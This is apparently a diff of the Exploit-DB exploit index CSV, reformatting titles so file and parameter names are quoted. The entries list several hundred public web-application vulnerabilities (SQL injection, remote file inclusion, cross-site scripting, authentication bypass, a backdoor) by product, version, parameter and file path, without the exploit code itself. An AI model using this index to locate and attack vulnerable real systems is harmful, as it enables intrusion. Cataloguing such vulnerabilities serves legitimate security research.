'Oku.asp' SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps,0 30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 @@ -31772,7 +31773,7 @@ id,file,description,date,author,platform,type,port 30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0 -30300,platforms/asp/webapps/30300.txt,"MzK Blog - Katgoster.asp SQL Injection",2007-03-23,GeFORC3,asp,webapps,0 +30300,platforms/asp/webapps/30300.txt,"MzK Blog - 'Katgoster.asp' SQL Injection",2007-03-23,GeFORC3,asp,webapps,0 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - 'header.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - 'footer.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 - 'secure.admin.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 @@ -31788,33 +31789,33 @@ id,file,description,date,author,platform,type,port 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo CMS 2.5.3 - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 -30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - showuser who Parameter Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps,0 -30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR - TakeProfEdit.php HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0 -30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 +30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps,0 +30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR - 'TakeProfEdit.php' HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0 +30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - 'Philboard_forum.asp' SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - '/install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - '/install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 -30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - index.asp SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 +30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - 'index.asp' SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,php,webapps,0 -30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - index.asp Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 +30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - 'index.asp' Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 -30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 +30332,platforms/asp/webapps/30332.txt,"Image Racer - 'searchresults.asp' SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - 'Function_List.php' Local File Inclusion",2007-07-23,You_You,php,webapps,0 30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 -30380,platforms/php/webapps/30380.txt,"cPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 +30380,platforms/php/webapps/30380.txt,"cPanel 10.9.1 - 'Resname' Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0 -30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - Search.Cache.Inc.php Backdoor",2007-11-21,D4m14n,php,webapps,0 +30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor",2007-11-21,D4m14n,php,webapps,0 30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",php,webapps,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 30357,platforms/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 @@ -31823,7 +31824,7 @@ id,file,description,date,author,platform,type,port 30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable - Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0 30364,platforms/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection",2013-12-16,3spi0n,php,webapps,0 30365,platforms/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection",2013-12-16,3spi0n,php,webapps,0 -30800,platforms/asp/webapps/30800.html,"FooSun - Api_Response.asp SQL Injection",2007-11-23,flyh4t,asp,webapps,0 +30800,platforms/asp/webapps/30800.html,"FooSun - 'Api_Response.asp' SQL Injection",2007-11-23,flyh4t,asp,webapps,0 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 40521,platforms/php/webapps/40521.txt,"Thatware 0.4.6 - SQL Injection",2016-10-13,Besim,php,webapps,0 @@ -31842,38 +31843,38 @@ id,file,description,date,author,platform,type,port 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - Philboard_Forum.asp SQL Injection",2007-07-27,Cr@zy_King,asp,webapps,0 -30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - Yonetici.asp SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 -30425,platforms/asp/webapps/30425.txt,"Online Store Application Template - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 -30426,platforms/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 +30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection",2007-07-27,Cr@zy_King,asp,webapps,0 +30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - 'Yonetici.asp' SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 +30425,platforms/asp/webapps/30425.txt,"Online Store Application Template - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 +30426,platforms/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 - 'lang-en.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 - 'menu-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30435,platforms/php/webapps/30435.txt,"IT!CMS 0.2 - 'titletext-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 -30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php' Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 +30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Theme Persuasion 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",php,webapps,80 30445,platforms/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 -30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 +30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - 'Duyuruoku.asp' SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection",2007-08-03,k1tk4t,php,webapps,0 -30450,platforms/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 +30450,platforms/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 -30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30457,platforms/php/webapps/30457.txt,"VietPHP - '/admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php?dirpath' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30457,platforms/php/webapps/30457.txt,"VietPHP - '/admin/index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' SQL Injection",2007-11-26,JosS,php,webapps,0 -30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30472,platforms/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80 @@ -31881,7 +31882,7 @@ id,file,description,date,author,platform,type,port 30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80 30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 @@ -31890,8 +31891,8 @@ id,file,description,date,author,platform,type,port 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusions",2007-07-09,Crackers_Child,php,webapps,0 -30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 -30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - TextFileSearch.asp Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 +30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - 'admin.php' Remote Authentication Bypass",2007-07-16,imei,php,webapps,0 +30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - 'TextFileSearch.asp' Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 30510,platforms/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 - 'Uyeler2.php' SQL Injection",2007-08-20,dumenci,php,webapps,0 @@ -31913,7 +31914,7 @@ id,file,description,date,author,platform,type,port 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - '/admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 -30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 +30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - 'admin.php' Authentication Bypass",2007-09-03,Demential,php,webapps,0 30556,platforms/php/webapps/30556.html,"Claroline 1.x - '/inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 30557,platforms/php/webapps/30557.txt,"Claroline 1.x - '/admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 30558,platforms/php/webapps/30558.txt,"Claroline 1.x - '/admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 @@ -31921,17 +31922,17 @@ id,file,description,date,author,platform,type,port 30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0 -30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 -30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 +30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - 'users/register.php' URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 +30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - 'search/index.php' URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - '/search/index.php?highlight' SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 -30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 -30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 +30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 +30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - 'anket.asp' SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 30572,platforms/php/webapps/30572.txt,"PHPMyQuote 0.20 - '/index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 -30573,platforms/php/webapps/30573.txt,"SisfoKampus - dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 +30573,platforms/php/webapps/30573.txt,"SisfoKampus - 'dwoprn.php' Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 @@ -31945,7 +31946,7 @@ id,file,description,date,author,platform,type,port 32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps,0 32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS - 'tienda.php' SQL Injection",2008-09-21,r45c4l,php,webapps,0 32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 - XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 - 'XTCsid' Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 - 'advanced_search_result.php?keywords' Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",php,webapps,0 32404,platforms/php/webapps/32404.html,"Fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps,0 32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' SQL Injection",2008-09-22,0x90,php,webapps,0 @@ -31964,37 +31965,37 @@ id,file,description,date,author,platform,type,port 30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities",2007-09-14,"Seth Fogie",cgi,webapps,0 -30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 +30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface '/admin/restartMessage.shtml?server' Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps,0 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0 30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,php,webapps,0 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - 'hilfe.php' Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 -30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 +30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 -30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 +30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - 'index.php' SQL Injection",2007-09-24,"nights shadow",php,webapps,0 30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 